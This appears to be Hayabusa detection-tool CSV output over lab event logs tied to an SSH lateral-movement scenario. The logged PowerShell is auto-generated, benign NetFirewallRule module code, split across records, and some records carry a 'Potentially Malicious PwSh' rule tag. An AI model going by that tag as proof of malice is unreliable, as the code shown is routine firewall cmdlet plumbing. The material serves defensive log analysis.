$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,ter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallRule' -Alias '*' function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 